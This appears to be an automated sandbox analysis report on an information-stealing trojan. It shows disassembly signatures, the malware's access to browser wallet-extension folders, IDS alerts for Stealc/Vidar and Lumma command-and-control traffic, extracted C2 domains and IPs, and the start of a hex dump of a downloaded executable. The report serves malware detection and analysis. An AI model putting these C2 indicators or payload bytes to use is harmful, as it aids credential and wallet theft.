Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 2_2_00415B4D GetProcessHeap,HeapAlloc,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,lstrcatA,lstrcatA,lstrlenA,lstrlenA,	2_2_00415B4D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 2_2_0040CD0C wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrlenA,DeleteFileA,CopyFileA,FindNextFileA,FindClose,	2_2_0040CD0C
Source: C:\ProgramData\AKEGIIJDGH.exe	Code function: 11_2_000EBFD4 FindFirstFileExW,	11_2_000EBFD4

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

Code function: 2_2_00415182 GetLogicalDriveStringsA,_memset,GetDriveTypeA,lstrcpyA,lstrcpyA,lstrcpyA,lstrlenA,

2_2_00415182

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\bg\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\html\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\images\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\css\	Jump to behavior

Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoader47.43477.29852.19410.exe	Code function: 4x nop then mov eax, dword ptr fs:[00000030h]	0_2_00C7039D
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoader47.43477.29852.19410.exe	Code function: 4x nop then mov dword ptr [ebp-04h], eax	0_2_00C7039D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4x nop then mov eax, dword ptr fs:[00000030h]	2_2_004014AD
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4x nop then mov dword ptr [ebp-04h], eax	2_2_004014AD
Source: C:\ProgramData\AKEGIIJDGH.exe	Code function: 4x nop then mov word ptr [eax], dx	11_2_001241D2
Source: C:\ProgramData\AKEGIIJDGH.exe	Code function: 4x nop then mov ecx, ebx	11_2_001241D2
Source: C:\ProgramData\AKEGIIJDGH.exe	Code function: 4x nop then movzx edx, byte ptr [edi+eax-17h]	11_2_001241D2
Source: C:\ProgramData\AKEGIIJDGH.exe	Code function: 4x nop then mov ebx, dword ptr [edi+04h]	11_2_0012E1E0
Source: C:\ProgramData\AKEGIIJDGH.exe	Code function: 4x nop then cmp word ptr [ebp+edi+02h], 0000h	11_2_00126240
Source: C:\ProgramData\AKEGIIJDGH.exe	Code function: 4x nop then cmp dword ptr [esi+edx*8], C85F7986h	11_2_0012A3F0
Source: C:\ProgramData\AKEGIIJDGH.exe	Code function: 4x nop then cmp dword ptr [edi+esi*8], C85F7986h	11_2_0012A3F0
Source: C:\ProgramData\AKEGIIJDGH.exe	Code function: 4x nop then movzx ebx, byte ptr [esp+ecx-3643ABD5h]	11_2_0012C420
Source: C:\ProgramData\AKEGIIJDGH.exe	Code function: 4x nop then mov edx, ecx	11_2_00128480
Source: C:\ProgramData\AKEGIIJDGH.exe	Code function: 4x nop then movzx edx, byte ptr [esi+ebx]	11_2_001045E0
Source: C:\ProgramData\AKEGIIJDGH.exe	Code function: 4x nop then movzx edi, byte ptr [esp+eax+14h]	11_2_0010C7B0
Source: C:\ProgramData\AKEGIIJDGH.exe	Code function: 4x nop then movzx edi, byte ptr [esp+ebx+04h]	11_2_0010C7B0
Source: C:\ProgramData\AKEGIIJDGH.exe	Code function: 4x nop then jmp eax	11_2_001427D4
Source: C:\ProgramData\AKEGIIJDGH.exe	Code function: 4x nop then cmp byte ptr [esi+ebx], 00000000h	11_2_0012E7F0
Source: C:\ProgramData\AKEGIIJDGH.exe	Code function: 4x nop then movzx ecx, byte ptr [esp+eax-73239D8Bh]	11_2_0012A7E0
Source: C:\ProgramData\AKEGIIJDGH.exe	Code function: 4x nop then movzx ebx, byte ptr [edx]	11_2_001387E0
Source: C:\ProgramData\AKEGIIJDGH.exe	Code function: 4x nop then movzx edi, byte ptr [ecx]	11_2_0010E833
Source: C:\ProgramData\AKEGIIJDGH.exe	Code function: 4x nop then movzx edx, byte ptr [ebp+esi-1Eh]	11_2_001428A5
Source: C:\ProgramData\AKEGIIJDGH.exe	Code function: 4x nop then mov eax, ebx	11_2_0010E8E6
Source: C:\ProgramData\AKEGIIJDGH.exe	Code function: 4x nop then cmp word ptr [esi+ecx+02h], 0000h	11_2_00120A2E
Source: C:\ProgramData\AKEGIIJDGH.exe	Code function: 4x nop then cmp byte ptr [edi+ecx], 00000000h	11_2_00144B67
Source: C:\ProgramData\AKEGIIJDGH.exe	Code function: 4x nop then jmp ecx	11_2_00144EB4
Source: C:\ProgramData\AKEGIIJDGH.exe	Code function: 4x nop then cmp dword ptr [ebx+edi*8], 07E776F1h	11_2_0012CF35
Source: C:\ProgramData\AKEGIIJDGH.exe	Code function: 4x nop then lea edi, dword ptr [esp+04h]	11_2_0012CF35
Source: C:\ProgramData\AKEGIIJDGH.exe	Code function: 4x nop then mov word ptr [eax], cx	11_2_0012CFC7
Source: C:\ProgramData\AKEGIIJDGH.exe	Code function: 4x nop then jmp edi	11_2_00142FC2
Source: C:\ProgramData\AKEGIIJDGH.exe	Code function: 4x nop then mov word ptr [esi], cx	11_2_00120FE7
Source: C:\ProgramData\AKEGIIJDGH.exe	Code function: 4x nop then mov byte ptr [edi], dl	11_2_0012F010
Source: C:\ProgramData\AKEGIIJDGH.exe	Code function: 4x nop then mov dword ptr [esp], 00000000h	11_2_0011D070
Source: C:\ProgramData\AKEGIIJDGH.exe	Code function: 4x nop then mov edi, dword ptr [esp+38h]	11_2_00129060
Source: C:\ProgramData\AKEGIIJDGH.exe	Code function: 4x nop then push 2CCA4B49h	11_2_0010D134
Source: C:\ProgramData\AKEGIIJDGH.exe	Code function: 4x nop then movzx edi, byte ptr [esi+ecx-43CF5BD5h]	11_2_001312AA
Source: C:\ProgramData\AKEGIIJDGH.exe	Code function: 4x nop then cmp dword ptr [ebx+edx*8], 87573896h	11_2_001452D0
Source: C:\ProgramData\AKEGIIJDGH.exe	Code function: 4x nop then jmp ecx	11_2_0012B395
Source: C:\ProgramData\AKEGIIJDGH.exe	Code function: 4x nop then cmp byte ptr [ebx+eax], 00000000h	11_2_0011D3D0
Source: C:\ProgramData\AKEGIIJDGH.exe	Code function: 4x nop then cmp dword ptr [ebx+edi*8], 03BA5404h	11_2_0013F4E0
Source: C:\ProgramData\AKEGIIJDGH.exe	Code function: 4x nop then mov byte ptr [edi], cl	11_2_0012F55A
Source: C:\ProgramData\AKEGIIJDGH.exe	Code function: 4x nop then cmp dword ptr [ebx+edi*8], 07E776F1h	11_2_0013F640
Source: C:\ProgramData\AKEGIIJDGH.exe	Code function: 4x nop then mov edi, ecx	11_2_0010F662
Source: C:\ProgramData\AKEGIIJDGH.exe	Code function: 4x nop then jmp ecx	11_2_0011D663
Source: C:\ProgramData\AKEGIIJDGH.exe	Code function: 4x nop then mov word ptr [eax], cx	11_2_0011F6D0
Source: C:\ProgramData\AKEGIIJDGH.exe	Code function: 4x nop then jmp eax	11_2_0010F798
Source: C:\ProgramData\AKEGIIJDGH.exe	Code function: 4x nop then push esi	11_2_0012B803
Source: C:\ProgramData\AKEGIIJDGH.exe	Code function: 4x nop then movzx ecx, byte ptr [esi+eax+74h]	11_2_00131882
Source: C:\ProgramData\AKEGIIJDGH.exe	Code function: 4x nop then movzx ecx, byte ptr [esi+eax+74h]	11_2_00131882
Source: C:\ProgramData\AKEGIIJDGH.exe	Code function: 4x nop then cmp dword ptr [ebx+esi*8], 62429966h	11_2_0013F990
Source: C:\ProgramData\AKEGIIJDGH.exe	Code function: 4x nop then cmp dword ptr [edi+esi*8], 07E776F1h	11_2_0012D9E2
Source: C:\ProgramData\AKEGIIJDGH.exe	Code function: 4x nop then movzx edi, byte ptr [ecx+esi]	11_2_00105A80
Source: C:\ProgramData\AKEGIIJDGH.exe	Code function: 4x nop then jmp dword ptr [0044EF6Ch]	11_2_0012BAC8
Source: C:\ProgramData\AKEGIIJDGH.exe	Code function: 4x nop then cmp dword ptr [edi+esi*8], 07E776F1h	11_2_0012BB18
Source: C:\ProgramData\AKEGIIJDGH.exe	Code function: 4x nop then cmp dword ptr [ecx+edi*8], FFFF4170h	11_2_00145B20
Source: C:\ProgramData\AKEGIIJDGH.exe	Code function: 4x nop then movzx ecx, byte ptr [esp+eax+312BE668h]	11_2_0013FBB0
Source: C:\ProgramData\AKEGIIJDGH.exe	Code function: 4x nop then cmp dword ptr [esi+edx*8], 7B3AFDABh	11_2_0013FBB0
Source: C:\ProgramData\AKEGIIJDGH.exe	Code function: 4x nop then movzx edx, byte ptr [esp+eax-2D586584h]	11_2_0013BBAD
Source: C:\ProgramData\AKEGIIJDGH.exe	Code function: 4x nop then movzx eax, word ptr [esi+ecx]	11_2_0013DCF0
Source: C:\ProgramData\AKEGIIJDGH.exe	Code function: 4x nop then movzx esi, byte ptr [esp+eax-0000008Dh]	11_2_0010BD50
Source: C:\ProgramData\AKEGIIJDGH.exe	Code function: 4x nop then cmp dword ptr [edx+ecx*8], C59B8BCBh	11_2_00145DF0
Source: C:\ProgramData\AKEGIIJDGH.exe	Code function: 4x nop then movzx ebp, word ptr [eax]	11_2_00145DF0
Source: C:\ProgramData\AKEGIIJDGH.exe	Code function: 4x nop then cmp dword ptr [edi+esi*8], 53F09CFAh	11_2_0011DE03
Source: C:\ProgramData\AKEGIIJDGH.exe	Code function: 4x nop then cmp dword ptr [edi+esi*8], 07E776F1h	11_2_0011DE03
Source: C:\ProgramData\AKEGIIJDGH.exe	Code function: 4x nop then cmp dword ptr [edi+esi*8], 07E776F1h	11_2_0011DE03
Source: C:\ProgramData\AKEGIIJDGH.exe	Code function: 4x nop then lea eax, dword ptr [esp+48h]	11_2_00129E4D
Source: C:\ProgramData\AKEGIIJDGH.exe	Code function: 4x nop then mov esi, dword ptr [esp+18h]	11_2_000FFEF0
Source: C:\ProgramData\AKEGIIJDGH.exe	Code function: 4x nop then movzx esi, byte ptr [esp+ecx-1Eh]	11_2_0010DFB0
Source: C:\ProgramData\AKEGIIJDGH.exe	Code function: 4x nop then cmp dword ptr [edi+edx*8], 731CDBF3h	11_2_0013FFD0
Source: C:\ProgramData\AKEGIIJDGH.exe	Code function: 4x nop then movzx ecx, byte ptr [esp+eax+5715E8D1h]	11_2_0013FFD0
Source: C:\ProgramData\AKEGIIJDGH.exe	Code function: 4x nop then push eax	11_2_00141FC0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4x nop then movzx edi, byte ptr [ecx]	13_2_0040F819
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4x nop then mov eax, ebx	13_2_0040F819
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4x nop then jmp eax	13_2_004438E4
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4x nop then movzx edx, byte ptr [ebp+esi-1Eh]	13_2_004439B5
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4x nop then jmp edi	13_2_00443D4F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4x nop then movzx esi, byte ptr [esp+eax-0000008Dh]	13_2_0040CE60
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4x nop then cmp dword ptr [ebx+edi*8], 07E776F1h	13_2_0042E049
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4x nop then lea edi, dword ptr [esp+04h]	13_2_0042E049
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4x nop then mov esi, dword ptr [esp+18h]	13_2_00401000
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4x nop then movzx esi, byte ptr [esp+ecx-1Eh]	13_2_0040F0C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4x nop then push eax	13_2_004430D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4x nop then mov word ptr [eax], cx	13_2_0042E0D7
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4x nop then cmp dword ptr [edi+edx*8], 731CDBF3h	13_2_004410E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4x nop then movzx ecx, byte ptr [esp+eax+5715E8D1h]	13_2_004410E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4x nop then movzx edi, byte ptr [esi+ecx-43CF5BD5h]	13_2_004320A3
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4x nop then mov byte ptr [edi], dl	13_2_00430120
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4x nop then mov byte ptr [edi], cl	13_2_00430120
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4x nop then mov dword ptr [esp], 00000000h	13_2_0041E180
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4x nop then push 2CCA4B49h	13_2_0040E244
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4x nop then mov word ptr [eax], dx	13_2_004252E2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4x nop then mov ecx, ebx	13_2_004252E2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4x nop then movzx edx, byte ptr [edi+eax-17h]	13_2_004252E2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4x nop then jmp ecx	13_2_0042C2EE
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4x nop then mov ebx, dword ptr [edi+04h]	13_2_0042F2F0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4x nop then cmp byte ptr [edi+ecx], 00000000h	13_2_004452A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4x nop then jmp ecx	13_2_004452A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4x nop then cmp word ptr [ebp+edi+02h], 0000h	13_2_00427350
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4x nop then mov edx, ecx	13_2_00429370
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4x nop then mov edi, dword ptr [esp+38h]	13_2_00429370
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4x nop then cmp dword ptr [ebx+edx*8], 87573896h	13_2_004463E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4x nop then cmp byte ptr [edi+ecx], 00000000h	13_2_004453F0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4x nop then jmp ecx	13_2_004453F0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4x nop then cmp byte ptr [ebx+eax], 00000000h	13_2_0041E4E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4x nop then cmp dword ptr [esi+edx*8], C85F7986h	13_2_0042B500
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4x nop then cmp dword ptr [edi+esi*8], C85F7986h	13_2_0042B500
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4x nop then mov edx, ecx	13_2_00429500
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4x nop then movzx ebx, byte ptr [esp+ecx-3643ABD5h]	13_2_0042D530
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4x nop then cmp dword ptr [ebx+edi*8], 03BA5404h	13_2_004405F0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4x nop then cmp byte ptr [edi+ecx], 00000000h	13_2_004455B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4x nop then jmp ecx	13_2_004455B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4x nop then jmp ecx	13_2_0041E670
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4x nop then movzx edx, byte ptr [esi+ebx]	13_2_004056F0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4x nop then cmp dword ptr [ebx+edi*8], 07E776F1h	13_2_00440750
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4x nop then mov edi, ecx	13_2_00410772
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4x nop then cmp byte ptr [edi+ecx], 00000000h	13_2_00445700
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4x nop then jmp ecx	13_2_00445700
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4x nop then cmp dword ptr [edi+esi*8], 07E776F1h	13_2_0042E7C2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4x nop then mov word ptr [eax], cx	13_2_004207E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4x nop then cmp byte ptr [edi+ecx], 00000000h	13_2_004457F0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4x nop then jmp ecx	13_2_004457F0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4x nop then movzx edi, byte ptr [esp+eax+14h]	13_2_0040D8C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4x nop then movzx edi, byte ptr [esp+ebx+04h]	13_2_0040D8C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4x nop then movzx ecx, byte ptr [esp+eax-73239D8Bh]	13_2_0042B8F0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4x nop then movzx ebx, byte ptr [edx]	13_2_004398F0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4x nop then jmp eax	13_2_004108A8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4x nop then cmp byte ptr [esi+ebx], 00000000h	13_2_0042F900
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4x nop then push esi	13_2_0042C913
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4x nop then movzx ecx, byte ptr [esi+eax+74h]	13_2_00432992
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4x nop then movzx ecx, byte ptr [esi+eax+74h]	13_2_00432992
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4x nop then cmp word ptr [esi+ecx+02h], 0000h	13_2_00421A60
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4x nop then cmp dword ptr [ebx+esi*8], 62429966h	13_2_00440AA0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4x nop then cmp byte ptr [edi+ecx], 00000000h	13_2_00445B20
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4x nop then jmp ecx	13_2_00445B20
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4x nop then jmp dword ptr [0044EF6Ch]	13_2_0042CBDC
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4x nop then movzx edi, byte ptr [ecx+esi]	13_2_00406B90
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4x nop then cmp dword ptr [edi+esi*8], 07E776F1h	13_2_0042CC28
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4x nop then cmp dword ptr [ecx+edi*8], FFFF4170h	13_2_00446C30
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4x nop then movzx ecx, byte ptr [esp+eax+312BE668h]	13_2_00440CC0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4x nop then cmp dword ptr [esi+edx*8], 7B3AFDABh	13_2_00440CC0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4x nop then movzx edx, byte ptr [esp+eax-2D586584h]	13_2_0043CCC5
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4x nop then lea eax, dword ptr [esp+48h]	13_2_0042AD00
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4x nop then jmp ecx	13_2_00445E70
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4x nop then movzx eax, word ptr [esi+ecx]	13_2_0043EE00
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4x nop then cmp dword ptr [edi+esi*8], 53F09CFAh	13_2_0041EE2E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4x nop then cmp dword ptr [edi+esi*8], 07E776F1h	13_2_0041EE2E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4x nop then cmp dword ptr [edi+esi*8], 07E776F1h	13_2_0041EE2E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4x nop then cmp dword ptr [edx+ecx*8], C59B8BCBh	13_2_00446F00
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4x nop then movzx ebp, word ptr [eax]	13_2_00446F00

Networking

Suricata IDS alerts for network traffic

Source: Network traffic	Suricata IDS: 2049087 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Style Headers In HTTP POST : 192.168.2.5:49755 -> 95.164.90.97:80
Source: Network traffic	Suricata IDS: 2044247 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Active C2 Responding with plugins Config : 95.164.90.97:80 -> 192.168.2.5:49755
Source: Network traffic	Suricata IDS: 2051831 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Active C2 Responding with plugins Config M1 : 95.164.90.97:80 -> 192.168.2.5:49755
Source: Network traffic	Suricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.5:49923 -> 172.67.140.193:443
Source: Network traffic	Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.5:49923 -> 172.67.140.193:443
Source: Network traffic	Suricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.5:49894 -> 188.114.96.3:443
Source: Network traffic	Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.5:49894 -> 188.114.96.3:443
Source: Network traffic	Suricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.5:49886 -> 188.114.96.3:443
Source: Network traffic	Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.5:49886 -> 188.114.96.3:443
Source: Network traffic	Suricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.5:49911 -> 104.21.33.249:443
Source: Network traffic	Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.5:49911 -> 104.21.33.249:443
Source: Network traffic	Suricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.5:49902 -> 188.114.97.3:443
Source: Network traffic	Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.5:49902 -> 188.114.97.3:443
Source: Network traffic	Suricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.5:49936 -> 104.21.79.35:443
Source: Network traffic	Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.5:49936 -> 104.21.79.35:443
Source: Network traffic	Suricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.5:49917 -> 172.67.205.156:443
Source: Network traffic	Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.5:49917 -> 172.67.205.156:443
Source: Network traffic	Suricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.5:49942 -> 188.114.96.3:443
Source: Network traffic	Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.5:49942 -> 188.114.96.3:443
Source: Network traffic	Suricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.5:49957 -> 172.67.206.204:443
Source: Network traffic	Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.5:49957 -> 172.67.206.204:443

C2 URLs / IPs found in malware configuration

Source: Malware configuration extractor	URLs: drawwyobstacw.sbs
Source: Malware configuration extractor	URLs: resinedyw.sbs
Source: Malware configuration extractor	URLs: mathcucom.sbs
Source: Malware configuration extractor	URLs: ehticsprocw.sbs
Source: Malware configuration extractor	URLs: enlargkiw.sbs
Source: Malware configuration extractor	URLs: allocatinow.sbs
Source: Malware configuration extractor	URLs: condifendteu.sbs
Source: Malware configuration extractor	URLs: vennurviot.sbs
Source: Malware configuration extractor	URLs: https://steamcommunity.com/profiles/76561199786602107
Source: Malware configuration extractor	URLs: https://t.me/maslengdsa

Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKServer: nginxDate: Tue, 08 Oct 2024 18:47:23 GMTContent-Type: application/octet-streamContent-Length: 2459136Last-Modified: Fri, 24 Nov 2023 13:43:06 GMTConnection: keep-aliveETag: "6560a86a-258600"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 1e d2 37 9f 5a b3 59 cc 5a b3 59 cc 5a b3 59 cc 11 cb 5a cd 6e b3 59 cc 11 cb 5c cd cf b3 59 cc 11 cb 5d cd 7f b3 59 cc 11 cb 58 cd 59 b3 59 cc 5a b3 58 cc d8 b3 59 cc 4f cc 5c cd 45 b3 59 cc 4f cc 5d cd 55 b3 59 cc 4f cc 5a cd 4c b3 59 cc 6c 33 5d cd 5b b3 59 cc 6c 33 59 cd 5b b3 59 cc 6c 33 a6 cc 5b b3 59 cc 6c 33 5b cd 5b b3 59 cc 52 69 63 68 5a b3 59 cc 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 07 00 69 a8 60 65 00 00 00 00 00 00 00 00 e0 00 02 21 0b 01 0e 25 00 d4 20 00 00 ca 04 00 00 00 00 00 7b 44 00 00 00 10 00 00 00 f0 20 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 f0 25 00 00 04 00 00 00 00 00 00 02 00 40 01 00 00 10 00 00 10 00 00 00 00 10 00 